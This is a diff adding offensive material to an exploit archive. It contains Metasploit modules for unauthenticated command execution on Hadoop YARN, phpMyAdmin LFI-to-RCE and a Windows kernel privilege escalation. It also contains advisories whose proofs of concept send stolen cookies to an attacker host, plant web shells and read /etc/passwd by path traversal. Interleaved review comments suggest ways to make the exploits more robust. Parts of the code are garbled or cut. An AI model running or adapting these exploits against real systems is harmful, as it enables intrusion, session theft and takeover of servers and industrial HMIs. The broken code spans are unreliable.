@@ -0,0 +1,92 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Hadoop YARN ResourceManager Unauthenticated Command Execution', + 'Description' => %q{ + This module exploits an unauthenticated command execution vulnerability in Apache Hadoop through ResourceManager REST API. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'cbmixx', # Proof of concept + 'Green-m ' # Metasploit module + ], + 'References' => + [ + ['URL', 'http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf'], + ['URL', 'https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn'] + ], + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Targets' => + [ + ['Automatic', {}] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Oct 19 2016', + 'DefaultTarget' => 0 + )) + + register_options([Opt::RPORT(8088)]) + end + + def check + begin + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'), + 'method' => 'POST' + ) + rescue Rex::ConnectionError + vprint_error("#{peer} - Connection failed") + return CheckCode::Unknown + end + + if res && res.code == 200 && res.body.include?('application-id') + return CheckCode::Detected + end + + CheckCode::Safe + end + + def exploit + print_status('Sending Command') + execute_cmdstager + end + + def execute_command(cmd, opts = {}) + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'), + 'method' => 'POST' + ) + + app_id = res.get_json_document['application-id'] + + post = { + 'application-id' => app_id, + 'application-name' => 
Rex::Text.rand_text_alpha_lower(4..12), + 'application-type' => 'YARN', + 'am-container-spec' => { + 'commands' => {'command' => cmd.to_s} + } + } + + send_request_cgi( + 'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps'), + 'method' => 'POST', + 'ctype' => 'application/json', + 'data' => post.to_json + ) + end + +end \ No newline at end of file diff --git a/exploits/php/remote/45020.rb b/exploits/php/remote/45020.rb new file mode 100755 index 000000000..4ba363bce --- /dev/null +++ b/exploits/php/remote/45020.rb 
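Review bot: `execute_command` dereferences `res` from the `new-application` POST without a nil check, so a timeout or reset connection surfaces as a `NoMethodError` on `res.get_json_document` instead of a module failure; guard it the way `check` does, e.g. `fail_with(Failure::UnexpectedReply, 'No application-id returned') unless res && res.code == 200`. `get_json_document` yields an empty hash when the body is not JSON, so `app_id` can also be nil and the second POST would then submit `'application-id' => nil`; the same guard should cover `app_id`. Since `check` already confirms that the unauthenticated endpoint hands out an `application-id`, returning `CheckCode::Detected` arguably understates what was verified, and `CheckCode::Appears` would be the more conventional code here.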
@@ -0,0 +1,234 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'phpMyAdmin Authenticated Remote Code Execution', + 'Description' => %q{ + phpMyAdmin v4.8.0 and v4.8.1 are vulnerable to local file inclusion, + which can be exploited post-authentication to execute PHP code by + application. The module has been tested with phpMyAdmin v4.8.1. + }, + 'Author' => + [ + 'ChaMd5', # Vulnerability discovery and PoC + 'Henry Huang', # Vulnerability discovery and PoC + 'Jacob Robles' # Metasploit Module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'BID', '104532' ], + [ 'CVE', '2018-12613' ], + [ 'CWE', '661' ], + [ 'URL', 'https://www.phpmyadmin.net/security/PMASA-2018-4/' ], + [ 'URL', 'https://www.secpulse.com/archives/72817.html' ], + [ 'URL', 'https://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-Authorited-CLI-to-RCE/' ] + ], + 'Privileged' => false, + 'Platform' => [ 'php' ], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + [ 'Automatic', {} ], + [ 'Windows', {} ], + [ 'Linux', {} ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jun 19 2018')) + + register_options( + [ + OptString.new('TARGETURI', [ true, "Base phpMyAdmin directory path", '/phpmyadmin/']), + OptString.new('USERNAME', [ true, "Username to authenticate with", 'root']), + OptString.new('PASSWORD', [ false, "Password to authenticate with", '']) + ]) + end + + def check + begin + res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path) }) + rescue + vprint_error("#{peer} - Unable to connect to server") + return Exploit::CheckCode::Unknown + end + + if res.nil? 
|| res.code != 200 + vprint_error("#{peer} - Unable to query /js/messages.php") + return Exploit::CheckCode::Unknown + end + + # v4.8.0 || 4.8.1 phpMyAdmin + if res.body =~ /PMA_VERSION:"(\d+\.\d+\.\d+)"/ + version = Gem::Version.new($1) + vprint_status("#{peer} - phpMyAdmin version: #{version}") + + if version == Gem::Version.new('4.8.0') || version == Gem::Version.new('4.8.1') + return Exploit::CheckCode::Appears + end + return Exploit::CheckCode::Safe + end + + return Exploit::CheckCode::Unknown + end + + def query(uri, qstring, cookies, token) + send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(uri, 'import.php'), + 'cookie' => cookies, + 'vars_post' => Hash[{ + 'sql_query' => qstring, + 'db' => '', + 'table' => '', + 'token' => token + }.to_a.shuffle] + }) + end + + def lfi(uri, data_path, cookies, token) + send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(uri, 'index.php'), + 'cookie' => cookies, + 'encode_params' => false, + 'vars_get' => { + 'target' => "db_sql.php%253f#{'/..'*16}#{data_path}" + } + }) + end + + def exploit + unless check == Exploit::CheckCode::Appears + fail_with(Failure::NotVulnerable, 'Target is not vulnerable') + end + + uri = target_uri.path + vprint_status("#{peer} - Grabbing CSRF token...") + + response = send_request_cgi({'uri' => uri}) + + if response.nil? + fail_with(Failure::NotFound, "#{peer} - Failed to retrieve webpage grabbing CSRF token") + elsif response.body !~ /token"\s*value="(.*?)"/ + fail_with(Failure::NotFound, "#{peer} - Couldn't find token. Is URI set correctly?") + end + token = Rex::Text.html_decode($1) + + if target.name =~ /Automatic/ + /\((?Win.*)?\)/ =~ response.headers['Server'] + mytarget = srv.nil? ? 
'Linux' : 'Windows' + else + mytarget = target.name + end + + vprint_status("#{peer} - Identified #{mytarget} target") + + #Pull out the last two cookies + cookies = response.get_cookies + cookies = cookies.split[-2..-1].join(' ') + + vprint_status("#{peer} - Retrieved token #{token}") + vprint_status("#{peer} - Retrieved cookies #{cookies}") + vprint_status("#{peer} - Authenticating...") + + login = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(uri, 'index.php'), + 'cookie' => cookies, + 'vars_post' => { + 'token' => token, + 'pma_username' => datastore['USERNAME'], + 'pma_password' => datastore['PASSWORD'] + } + }) + + if login.nil? || login.code != 302 + fail_with(Failure::NotFound, "#{peer} - Failed to retrieve webpage") + end + + #Ignore the first cookie + cookies = login.get_cookies + cookies = cookies.split[1..-1].join(' ') + vprint_status("#{peer} - Retrieved cookies #{cookies}") + + login_check = send_request_cgi({ + 'uri' => normalize_uri(uri, 'index.php'), + 'vars_get' => { 'token' => token }, + 'cookie' => cookies + }) + + if login_check.nil? + fail_with(Failure::NotFound, "#{peer} - Failed to retrieve webpage") + elsif login_check.body.include? 'Welcome to' + fail_with(Failure::NoAccess, "#{peer} - Authentication failed") + elsif login_check.body !~ /token"\s*value="(.*?)"/ + fail_with(Failure::NotFound, "#{peer} - Couldn't find token. 
Is URI set correctly?") + end + token = Rex::Text.html_decode($1) + + vprint_status("#{peer} - Authentication successful") + + #Generating strings/payload + database = rand_text_alpha_lower(5) + table = rand_text_alpha_lower(5) + column = rand_text_alpha_lower(5) + col_val = "''" + + + #Preparing sql queries + dbsql = "CREATE DATABASE #{database};" + tablesql = "CREATE TABLE #{database}.#{table}(#{column} varchar(4096) DEFAULT #{col_val});" + dropsql = "DROP DATABASE #{database};" + dirsql = 'SHOW VARIABLES WHERE Variable_Name Like "%datadir";' + + #Create database + res = query(uri, dbsql, cookies, token) + if res.nil? || res.code != 200 + fail_with(Failure::UnexpectedReply, "#{peer} - Failed to create database") + end + + #Create table and column + res = query(uri, tablesql, cookies, token) + if res.nil? || res.code != 200 + fail_with(Failure::UnexpectedReply, "#{peer} - Failed to create table") + end + + #Find datadir + res = query(uri, dirsql, cookies, token) + if res.nil? || res.code != 200 + fail_with(Failure::UnexpectedReply, "#{peer} - Failed to find data directory") + end + + unless res.body =~ /^(.*)?.*?);/ =~ cookies + data_path = "/var/lib/php/sessions/sess_#{session_name}" + end + + res = lfi(uri, data_path, cookies, token) + + #Drop database + res = query(uri, dropsql, cookies, token) + if res.nil? || res.code != 200 + print_error("#{peer} - Failed to drop database #{database}. Might drop when your session closes.") + end + end +end \ No newline at end of file diff --git a/exploits/php/webapps/45014.txt b/exploits/php/webapps/45014.txt new file mode 100644 index 000000000..0b2135eee --- /dev/null +++ b/exploits/php/webapps/45014.txt 
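Review bot: `check` wraps the first request in a bare `rescue`, which in Ruby catches every `StandardError` (including programming errors such as `NoMethodError`) and reports them all as `CheckCode::Unknown`; narrow it to `rescue ::Rex::ConnectionError` so only connectivity problems are treated that way. The message on the next branch, `Unable to query /js/messages.php`, does not describe the request actually sent, which goes to `normalize_uri(target_uri.path)`; `"#{peer} - Unable to query #{normalize_uri(target_uri.path)}"` would report the failure accurately. The cookie handling in `exploit` (`cookies.split[-2..-1]` and later `split[1..-1]`) assumes a fixed number of `Set-Cookie` headers with no check, so a deployment that sets one extra cookie sends the wrong session cookies and fails only at the `Authentication failed` branch; that assumption deserves a comment and a length check before slicing. The datadir parsing around `data_path` is not legible in this rendering, so I cannot assess the regex that feeds it.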
@@ -0,0 +1,325 @@ +SEC Consult Vulnerability Lab Security Advisory < 20180711-0 > +======================================================================= + title: Remote code execution via multiple attack vectors + product: WAGO e!DISPLAY 7300T - WP 4.3 480x272 PIO1 + vulnerable version: FW 01 - 01.01.10(01) + fixed version: FW 02 + CVE number: CVE-2018-12979, CVE-2018-12980, CVE-2018-12981 + impact: High + homepage: https://www.wago.com/ + found: 2018-04-25 + by: T. Weber (Office Vienna) + SEC Consult Vulnerability Lab + + An integrated part of SEC Consult + Europe | Asia | North America + + https://www.sec-consult.com + +======================================================================= + +Vendor description: +------------------- +"New ideas are the driving force behind our success WAGO is a family-owned +company headquartered in Minden, Germany. Independently operating for three +generations, WAGO is the global leader of spring pressure electrical +interconnect and automation solutions. For more than 60 years, WAGO has +developed and produced innovative products for packaging, transportation, +process, industrial and building automation markets amongst others. Aside from +its innovations in spring pressure connection technology, WAGO has introduced +numerous innovations that have revolutionized industry. Further ground-breaking +inventions include: the WAGO-I/O-SYSTEM®, TOPJOB S® and WALL-NUTS®." + +Source: http://www.wago.us/wago/ + +"For visualization tasks with CODESYS 2 and CODESYS 3: WAGO's new e!DISPLAY +7300T Web Panels help you reinforce the quality of your machinery and equipment +with a refined design and industry-leading software. Learn more about how the +right Web Panels make a difference. + +HMI components are the finishing touch for machines or systems and they have an +overwhelming impact on purchase decisions. 
WAGO offers aesthetically pleasing +HMIs that leave a lasting impression and significantly increase both the value +and image of your machine or system. WAGO’s e!DISPLAY 7300T Web Panel is +available in 4.3'', 5.7'', 7.0'' and 10.1'' display sizes." + +Source: +http://www.wago.us/products/components-for-automation/operation-and-monitoring/web-panels-edisplay-7300t/overview/index.jsp + + +Business recommendation: +------------------------ +HMI displays are widely used in SCADA infrastructures. The link between +their administrative (or informational) web interfaces and the users which +access these interfaces is critical. The presented attacks demonstrate how +simple it is to inject malicious code in order to break the security of this +link by exploiting minimal user interaction. + +As a consequence a computer which is used for HMI administration should not +provide any possibility to get compromised via malicious script code. + +One possible solution may be e.g.: + * Don't allow email clients + * Don't provide Internet access at all on the HMI stations + +SEC Consult recommends to immediately apply the available patches from the vendor. +A thorough security review should be performed by security professionals to +identify further potential security issues. + + +Vulnerability overview/description: +----------------------------------- +1) Multiple Reflected POST Cross-Site Scripting (CVE-2018-12981) +Reflected cross site scripting vulnerabilities were identified within multiple PHP +scripts in the admin interface. The parameter JSON input which is sent to the +device is not sanitized sufficiently. An attacker can exploit this +vulnerability to execute arbitrary scripts in the context of the attacked user +and gain control over the active session. + +This vulnerability is present for authenticated and unauthenticated users! 
+ + +2) Stored Cross-Site Scripting (CVE-2018-12981) +A stored cross-site scripting vulnerability was identified within the +"PLC List" which can be configured in the web interface of the e!Display. By +storing a payload there, an administrative or guest user can be attacked +without tricking them to visit a malicious web site or clicking on an +malicious link. + +This vulnerability is only present for authenticated users! + + +3) Unrestricted File Upload and File Path Manipulation (CVE-2018-12980) +Arbitrary files can be uploaded to the system without any check. It is even +possible to change the location of the uploaded file on the system. As the +web service does not run as privileged user, it is not possible to upload a +file directly to the web root but on many other locations on the file system. +The normal user 'user' and the administrative user 'admin' can both upload +files to the system. + + +4) Incorrect Default Permissions (CVE-2018-12979) +Due to incorrect default permissions a file in the web root can be overwritten +by the unprivileged 'www' user. This is the same user which is used in the +context of the web server. + + +5) Remote code execution via multiple attack vectors +By stacking vulnerability 1)/2), 3) and 4) with this vulnerability an outside +attacker can place a malicious script on the device in order to execute arbitrary +commands as 'www'. This can be done by uploading a web shell or a reverse +shell. + + +Proof of concept: +----------------- +1) Multiple Reflected POST Cross-Site Scripting (CVE-2018-12981) +The affected endpoints are: +http:///wbm/configtools.php +http:///wbm/login.php +http:///wbm/receive_upload.php + +The following request is an example for reflected XSS within 'configtools.php': +------------------------------------------------------------------------------- +POST /wbm/configtools.php HTTP/1.1 +Host: +Content-type: text/plain +[...] 
+ +{"sessionId":"","aDeviceParams":{"0":{"name":"firewall","parameter":["iptables","--get-xml"],"sudo":true,"multiline":true,"timeout":10000},"1":{"name":"firewall","parameter":["firewall","--is-enabled"],"sudo":true,"multiline":true,"timeout":10000,"dataId":"{DoNotParseAsXml};"}}} +------------------------------------------------------------------------------- + + +Steal the cookie via XSS and send it to http://$attacker:8001?c=: +------------------------------------------------------------------------------- + + + +
+ + +
+ + +------------------------------------------------------------------------------- + + +2) Stored Cross-Site Scripting (CVE-2018-12981) +To exploit this vulnerability malicious code has to be placed in the "PLC List" +by surfing to the endpoint http:///app/index.html and clicking on +the tab "Application->PLC-List". By opening one of the configurable PLCs the +name can be changed in the box "Text:" in order to execute arbitrary script- +code. For example: + + +The payload can also be placed on the device by using the following POST request: +------------------------------------------------------------------------------- +POST /wbm/configtools.php HTTP/1.1 +Host: +[...] + +{"sessionId":" +","aDeviceParams":{"0":{"name":"config_plcselect","parameter":[2,"url=https://127.0.0.1:8001","txt=","vkb=enabled","mon=1"],"sudo":true}}} +------------------------------------------------------------------------------- + + +3) Unrestricted File Upload and File Path Manipulation (CVE-2018-12980) +The file path, the file name and the file content can be manipulated in any +way. There is no server-side check for malicious files. + +------------------------------------------------------------------------------- +POST /wbm/receive_upload.php HTTP/1.1 +Host: +[...] 
+Content-Type: multipart/form-data; +boundary=---------------------------728140389204955163192597293 + +-----------------------------728140389204955163192597293 +Content-Disposition: form-data; name="touchWbm" + +true +-----------------------------728140389204955163192597293 +Content-Disposition: form-data; name="upload_type" + +font +-----------------------------728140389204955163192597293 +Content-Disposition: form-data; name="session_id" + + +-----------------------------728140389204955163192597293 +Content-Disposition: form-data; name="upload_directory" + +/tmp/ +-----------------------------728140389204955163192597293 +Content-Disposition: form-data; name="font_file"; filename="any_file.sh" +Content-Type: application/x-font-ttf + +any-content #! + + +-----------------------------728140389204955163192597293-- +------------------------------------------------------------------------------- + + +4) Incorrect Default Permissions (CVE-2018-12979) +The file 'index.html' is owned by 'www' and can therefore also be overwritten +with a web shell. + +www@WAGO_eDisplay:/var/www ls -la +drwxr-xr-x 5 root root 488 XXX 99 2018 . +drwxr-xr-x 11 root root 824 XXX 99 2018 .. +lrwxrwxrwx 1 root root 16 XXX 99 2018 app -> /var/www/WagoWBM +-rw-r--r-- 1 www www 345 XXX 99 2018 index.html +drwxr-xr-x 7 root root 776 XXX 99 2018 plclist +drwxr-xr-x 3 root root 368 XXX 99 2018 WagoWBM +drwxr-xr-x 2 root root 688 XXX 99 2018 wbm + + +5) Remote code execution via multiple attack vectors +By uploading a simple PHP shell and overwriting the 'index.html' file located +under the web root an attacker can place a web shell which is reachable without +any authentication. + +------------------------------------------------------------------------------- +POST /wbm/receive_upload.php HTTP/1.1 +Host: +[...] 
+Content-Type: multipart/form-data; +boundary=---------------------------728140389204955163192597293 + +-----------------------------728140389204955163192597293 +Content-Disposition: form-data; name="touchWbm" + +true +-----------------------------728140389204955163192597293 +Content-Disposition: form-data; name="upload_type" + +font +-----------------------------728140389204955163192597293 +Content-Disposition: form-data; name="session_id" + + +-----------------------------728140389204955163192597293 +Content-Disposition: form-data; name="upload_directory" + +/var/www/ +-----------------------------728140389204955163192597293 +Content-Disposition: form-data; name="font_file"; filename="index.html" +Content-Type: application/x-font-ttf + + +
+
+
+ + + +-----------------------------728140389204955163192597293-- +------------------------------------------------------------------------------- + +The shell can now be reached via "http:///index.html". It is also +possible to upload a reverse-shell to the system which connects to a computer +outside of the actual network. + + +Vulnerable / tested versions: +----------------------------- +The following device with the firmware version has been tested: + +* e!DISPLAY 7300T - WP 4.3 480x272 PIO1 - 01.01.10(01) + +According to WAGO the following e!DISPLAY versions are vulnerable: +762-3000 FW 01 +762-3001 FW 01 +762-3002 FW 01 +762-3003 FW 01 + + +Vendor contact timeline: +------------------------ +2018-04-30: Sending encrypted advisory to VDE CERT for coordination support + (info@cert.vde.com) +2018-05-02: Answer from VDE CERT that WAGO will be informed/contacted +2018-05-08: Status update from VDE CERT +2018-05-23: Asking for status update, no news from WAGO (via VDE CERT) +2018-06-08: VDE CERT: WAGO fixed the vulnerabilities and firmware is in + testing phase +2018-06-12: WAGO requested more time, postponing release date, asking for + affected & fixed versions +2018-06-13: VDE CERT will request CVE numbers +2018-06-17: WAGO scheduled the release for 2018-07-11 +2018-06-26: VDE CERT sends WAGO advisory draft including affected/fixed versions +2018-07-04: VDE CERT sends final WAGO advisory incl. CVE numbers +2018-07-10: VDE CERT publishes security notice: + https://cert.vde.com/de-de/advisories/vde-2018-010 +2018-07-11: SEC Consult advisory release + + +Solution: +--------- +Update the device to the latest available firmware (FW 02). 
For further +information see the vendor's security notifications page: + +https://www.wago.com/de/automatisierungstechnik/security (German) + +Direct link to English WAGO advisory: +https://www.wago.com/medias/SA-WBM-2018-004.pdf?context=bWFzdGVyfHJvb3R8MjgyNzYwfGFwcGxpY2F0aW9uL3BkZnxoMWUvaDg4LzkzNjE3NTIxOTUxMDIucGRmfDU1NmJkYjEzNDY0ZGU4OWQ1OTMyMjUwNTlmZTI0MzgwNDQ1MDY1YzU3OWRmZDk1NzYzODAwMDI3ODg1NDJlZjU + + + +Workaround: +----------- +Restrict network access to the device, don't allow Internet access from the +HMI station and do not install software from untrusted sources. + + +Advisory URL: +------------- +https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html \ No newline at end of file diff --git a/exploits/php/webapps/45016.txt b/exploits/php/webapps/45016.txt new file mode 100644 index 000000000..43783b06f --- /dev/null +++ b/exploits/php/webapps/45016.txt 
@@ -0,0 +1,152 @@ +SEC Consult Vulnerability Lab Security Advisory < 20180712-0 > +======================================================================= + title: Remote Code Execution & Local File Disclosure + product: Zeta Producer Desktop CMS + vulnerable version: <=14.2.0 + fixed version: >=14.2.1 + CVE number: CVE-2018-13981, CVE-2018-13980 + impact: critical + homepage: https://www.zeta-producer.com + found: 2017-11-25 + by: P. Morimoto (Office Bangkok) + SEC Consult Vulnerability Lab + + An integrated part of SEC Consult + Europe | Asia | North America + + https://www.sec-consult.com + +======================================================================= + +Vendor description: +------------------- +"With Zeta Producer, the website builder and online shop system for Windows, +you can create and manage your website locally, on your computer. +Get without expertise in 3 steps to your own homepage: select design, +paste content, publish website. Finished." + +Source: https://www.zeta-producer.com/de/index.html + + +Business recommendation: +------------------------ +The vendor provides a patched version which should be installed immediately. + +Users of the product also need to verify that the affected widgets are updated in +the corresponding website project! It could be necessary to rebuild the whole project +or copy the new widgets to the website projects. For further information consult the +vendor. + +Furthermore, an in-depth security analysis is highly advised, as the software may be +affected from further security issues. + + +Vulnerability overview/description: +----------------------------------- +1) Remote Code Execution (CVE-2018-13981) +The email contact functionality of the widget "formmailer" can upload files +to the server but if the user uploads a PHP script with a .php extension +then the server will rename it to .phps to prevent PHP code execution. + +However, the attacker can upload .php5 or .phtml to the server without any +restriction. 
These alternative file extensions can be executed as PHP code. + +Furthermore, the server will create a folder to store the files, with a +random name using PHP's "uniqid" function. + +Unfortunately, if the server permits directory listing, the attacker +can easily browse to the uploaded PHP script. If no directory listing is +enabled the attacker can still bruteforce the random name to gain remote +code execution via the PHP script as well. Testing on a local server it +took about 20 seconds to brute force the random name. This attack will +be slower over the Internet but it is still feasible. + +Also, if the user runs the Zeta Producer Desktop CMS GUI client locally, +they are also vulnerable because the web server will be running on TCP port 9153. + +The root cause is in the widget "formmailer" which is enabled by default. +The following files are affected: +- /assets/php/formmailer/SendEmail.php +- /assets/php/formmailer/functions.php + + +2) Local File Disclosure (CVE-2018-13980) +If the user enables the widget "filebrowser" on Zeta Producer Desktop CMS an +unauthenticated attacker can read local files by exploiting path traversal issues. + +The following files are affected: +- /assets/php/filebrowser/filebrowser.main.php + + +Proof of concept: +----------------- +1) Remote Code Execution (CVE-2018-13981) +The following python script can be used to exploit the chain of vulnerabilities. +[.. code has been removed to prevent misuses ..] + +When the script is executed, a PHP script (shell) will be uploaded automatically. 
+# $ python exploit.py +# [+] injecting webshell to http://target/assets/php/formmailer/SendEmail.php +# +# 5a1a5bc991afe +# 5a1a5bc99453a +# 10812 +# [*] Found : http://target/assets/php/formmailer/upload_5a1a5bc992772/sectest.php5 +# uid=33(www-data) gid=33(www-data) groups=33(www-data) + + +2) Local File Disclosure (CVE-2018-13980) +The parameter "file" in the "filebrowser.main.php" script can be exploited to read +arbitrary files from the OS with the privileges of the web server user. +Any unauthenticated user can exploit this issue! + +http://target/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download +http://target/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc&do=list + + +Vulnerable / tested versions: +----------------------------- +The following versions have been tested which were the latest version available +at the time of the test: + +Zeta Producer Desktop CMS 14.1.0 +Zeta Producer Desktop CMS 14.2.0 + +Source: +- https://www.zeta-producer.com/de/download.html +- https://github.com/ZetaSoftware/zeta-producer-content/ + + +Vendor contact timeline: +------------------------ +2017-11-29: Contacting vendor through info@zeta-producer.com and various other + email addresses from the website. No reply. +2017-12-13: Contacting vendor again, extending email address list, no reply +2018-01-09: Contacting vendor again +2018-01-10: Vendor replies, requests transmission of security advisory +2018-01-10: Sending unencrypted security advisory +2018-07-02: There was no feedback from the vendor but the version 14.2.1 fixed + the reported vulnerabilities. +2018-07-12: Public advisory release. + + +Solution: +--------- +Upgrade to version 14.2.1 or newer. See the vendor's download page: + +https://www.zeta-producer.com/de/download.html + +Users of the product also need to verify that the affected widgets are updated in +the corresponding website project! 
It could be necessary to rebuild the whole project +or copy the new widgets to the website projects. For further information consult the +vendor. + + +Workaround: +----------- +Remove "formmailer" and "filebrowser" widgets. + + +Advisory URL: +------------- +https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html \ No newline at end of file diff --git a/exploits/windows/dos/45017.html b/exploits/windows/dos/45017.html new file mode 100644 index 000000000..eee9b126e --- /dev/null +++ b/exploits/windows/dos/45017.html @@ -0,0 +1,73 @@ + + + + + + + + \ No newline at end of file diff --git a/exploits/windows/local/45024.rb b/exploits/windows/local/45024.rb new file mode 100755 index 000000000..498eea18f --- /dev/null +++ b/exploits/windows/local/45024.rb 
@@ -0,0 +1,174 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/post/common' +require 'msf/core/post/file' +require 'msf/core/post/windows/priv' +require 'msf/core/post/windows/registry' +require 'msf/core/exploit/exe' + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::Common + include Msf::Post::File + include Msf::Post::Windows::Priv + include Msf::Exploit::EXE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability', + 'Description' => %q{ + This module exploits a vulnerability in a statement in the system programming guide + of the Intel 64 and IA-32 architectures software developer's manual being mishandled + in various operating system kerneles, resulting in unexpected behavior for #DB + excpetions that are deferred by MOV SS or POP SS. + + This module will upload the pre-compiled exploit and use it to execute the final + payload in order to gain remote code execution. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Nick Peterson', # Original discovery (@nickeverdox) + 'Nemanja Mulasmajic', # Original discovery (@0xNemi) + 'Can Bölük ', # PoC + 'bwatters-r7' # msf module + ], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ], + 'Targets' => + [ + [ 'Windows x64', { 'Arch' => ARCH_X64 } ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'May 08 2018', + 'References' => + [ + ['CVE', '2018-8897'], + ['EDB', '44697'], + ['BID', '104071'], + ['URL', 'https://github.com/can1357/CVE-2018-8897/'], + ['URL', 'https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/'] + ], + 'DefaultOptions' => + { + 'DisablePayloadHandler' => 'False' + } + )) + + register_options([ + OptString.new('EXPLOIT_NAME', + [false, 'The filename to use for the exploit binary (%RAND% by default).', nil]), + OptString.new('PAYLOAD_NAME', + [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]), + OptString.new('PATH', + [false, 'Path to write binaries (%TEMP% by default).', nil]), + OptInt.new('EXECUTE_DELAY', + [false, 'The number of seconds to delay before executing the exploit', 3]) + ]) + end + + def setup + super + @exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) + @payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) + @exploit_name = "#{exploit_name}.exe" unless exploit_name.match(/\.exe$/i) + @payload_name = "#{payload_name}.exe" unless payload_name.match(/\.exe$/i) + @temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP') + @payload_path = "#{temp_path}\\#{payload_name}" + @exploit_path = "#{temp_path}\\#{exploit_name}" + @payload_exe = generate_payload_exe + end + + def validate_active_host + begin + host = session.session_host + print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}") + rescue Rex::Post::Meterpreter::RequestError => e 
+ elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") + raise Msf::Exploit::Failed, 'Could not connect to session' + end + end + + def validate_remote_path(path) + unless directory?(path) + fail_with(Failure::Unreachable, "#{path} does not exist on the target") + end + end + + def validate_target + if sysinfo['Architecture'] == ARCH_X86 + fail_with(Failure::NoTarget, 'Exploit code is 64-bit only') + end + if sysinfo['OS'] =~ /XP/ + fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP') + end + end + + def ensure_clean_destination(path) + if file?(path) + print_status("#{path} already exists on the target. Deleting...") + begin + file_rm(path) + print_status("Deleted #{path}") + rescue Rex::Post::Meterpreter::RequestError => e + elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") + print_error("Unable to delete #{path}") + end + end + end + + def ensure_clean_exploit_destination + ensure_clean_destination(exploit_path) + end + + def ensure_clean_payload_destination + ensure_clean_destination(payload_path) + end + + def upload_exploit + local_exploit_path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-8897-exe', 'cve-2018-8897-exe.exe') + upload_file(exploit_path, local_exploit_path) + print_status("Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}") + end + + def upload_payload + write_file(payload_path, payload_exe) + print_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}") + end + + def execute_exploit + sleep(datastore['EXECUTE_DELAY']) + print_status("Running exploit #{exploit_path} with payload #{payload_path}") + output = cmd_exec('cmd.exe', "/c #{exploit_path} #{payload_path}") + vprint_status(output) + end + + def exploit + begin + validate_active_host + validate_target + validate_remote_path(temp_path) + ensure_clean_exploit_destination + ensure_clean_payload_destination + upload_exploit + upload_payload + execute_exploit + rescue 
Rex::Post::Meterpreter::RequestError => e + elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") + print_error(e.message) + ensure_clean_exploit_destination + ensure_clean_payload_destination + end + end + + attr_reader :exploit_name + attr_reader :payload_name + attr_reader :payload_exe + attr_reader :temp_path + attr_reader :payload_path + attr_reader :exploit_path +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index d1651445d..87c8d5bec 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6016,6 +6016,7 @@ id,file,description,date,author,type,platform,port 45011,exploits/windows/dos/45011.js,"Microsoft Edge Chakra JIT - Out-of-Bounds Reads/Writes",2018-07-12,"Google Security Research",dos,windows, 45012,exploits/windows/dos/45012.js,"Microsoft Edge Chakra JIT - BoundFunction::NewInstance Out-of-Bounds Read",2018-07-12,"Google Security Research",dos,windows, 45013,exploits/windows/dos/45013.js,"Microsoft Edge Chakra JIT - Type Confusion with Hoisted SetConcatStrMultiItemBE Instructions",2018-07-12,"Google Security Research",dos,windows, +45017,exploits/windows/dos/45017.html,"G DATA Total Security 25.4.0.3 - Activex Buffer Overflow",2018-07-13,"Filipe Xavier Oliveira",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege 